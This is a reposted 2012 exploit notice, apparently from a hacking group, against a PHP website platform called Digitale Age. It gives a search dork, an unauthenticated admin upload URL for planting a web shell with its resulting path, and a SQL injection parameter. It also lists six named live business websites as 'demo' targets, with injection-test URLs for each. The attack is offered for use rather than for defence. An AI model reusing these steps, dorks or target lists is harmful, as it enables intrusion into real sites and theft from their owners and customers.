Digitale Age File Upload Vulnerability | BOT24

Digitale Age File Upload Vulnerability


# Exploit Title: Digitale Age File Upload vulnerability
# Date: [2012-12-29]
# Author: The Black Devils
# Vendor : http://www.digitalage.fr/
# Category : [ webapps ]
# Dork:Fabriqué par: Safe & Web Company (((( Digital Age ))))
# Type : php
# Tested on: [Windows] & [Ubuntu]



http://Localost/admin/plugin/file_list_process.php?tablename=galerie&nId=0&size=&bFixedWidth=&bFixedHeight=&nType=0&nAUEindex=0&bTitle=1&bText=0

thn upload your shell using tamber data then you'll find it in these directory

http://localhost/photo/galerie/0/Cyber.php



Demo
http://www.assurances-guillaume.com/admin/
http://www.millionpereetfils.com/admin
http://www.vert-eco-materiaux.com/admin
http://www.la-hyene-jeans.com/admin/
http://www.dba-demenagement-41.com/admin
http://www.dp-toiture.com/admin


Sql injection

# Dork:inurl:mdm-popup.php?id=
# Type : php
# Tested on: [Windows] & [Ubuntu]


http://Localhost/mdm-popup.php?id= [sql Injection]

Demo
http://www.assurances-guillaume.com/mdm-popup.php?id=6'
http://www.millionpereetfils.com/mdm-popup.php?id=2'
http://www.vert-eco-materiaux.com/mdm-popup.php?id=2'
http://www.la-hyene-jeans.com/mdm-popup.php?id=2'
http://www.dba-demenagement-41.com/mdm-popup.php?id=2'
http://www.dp-toiture.com/mdm-popup.php?id=5'


#------------------
Greet's To:r0073r & sH3LL05Dz & Dz-CombatanT & all Inj3ctor Team & Arab47.com & is-sec.org Members & Newbie3viLc063s & All The Algerian Hackerz
#------------------
Contact:
https://www.facebook.com/DevilsDz
https://www.facebook.com/necesarios
#------------------


//The information contained within this publication is

//supplied "as-is"with no warranties or guarantees of fitness

//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts

//responsibility for any damage caused by the use or misuse of

//this information

Share on Google Plus

About Bradley Susser

    Blogger Comment
    Facebook Comment

0 comments :

Post a Comment